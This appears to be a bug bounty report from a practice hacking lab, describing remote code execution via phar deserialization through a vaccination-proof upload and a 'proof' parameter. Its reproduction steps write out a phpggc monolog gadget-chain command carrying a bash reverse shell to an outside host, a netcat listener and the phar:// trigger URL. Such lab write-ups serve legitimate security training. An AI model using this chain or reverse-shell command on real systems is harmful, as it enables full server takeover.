FirstBlood-#728 — Remote Command Execution via deserialization by uploading phar file
This issue was discovered on FirstBlood v2
On 2021-10-27, neolex Level 2 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Description
This is possible for an attacker to get remote code execution by uploading a phar file via the https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/submit-vaccination-proof.php endpoint.
and then trigger the deserialization and get RCE using a phar:// uri on https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
Step to reproduce
-
clone the following repository https://github.com/ambionics/phpggc and go inside the directory
-
run the following command :
./phpggc -pj /tmp/dummy.jpg -o /tmp/z.zip.phar monolog/rce4 "bash -i >& /dev/tcp/neolex.dev/8000 0>&1"
with dummy.jpg any valid jpg file , and replacing neolex.dev by your domain or ip
-
listen on port 8000 inside you server via nc -lnvp 8000
-
Upload the following image ( /tmp/z.zip.phar) inside https://792406c141d1-neolex.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
-
look inside the burp proxy the request made to /api/checkproof.php for exemple in my case the request is for the url : https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=/app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
-
send this request to repeater and add phar:// before the path and send the request
https://792406c141d1-neolex.a.firstbloodhackers.com/api/checkproof.php?proof=phar:///app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
-
You should have a reverse shell inside your netcat listener
Impact
Remote code execution, An attacker can completely takover the server and run a bash shell inside.
P1 CRITICAL
Endpoint: /api/checkproof.php
Parameter: proof
Payload: phar:///app/firstblood/upload/89a7a1262c04e7f6800f064ee9fc6108bf5971cf.jpg
FirstBlood ID: 34
Vulnerability Type: Deserialization
This endpoint calls filesize() on the path provided in the 'proof' param with no filtering or sanitisation. By adding the phar:// stream handler to the path, an attacker can force a previously uploaded file to be sent through deserialisation. Coupled with the fact that a gadget-chain vulnerable version of monolog is being used, this allows for RCE.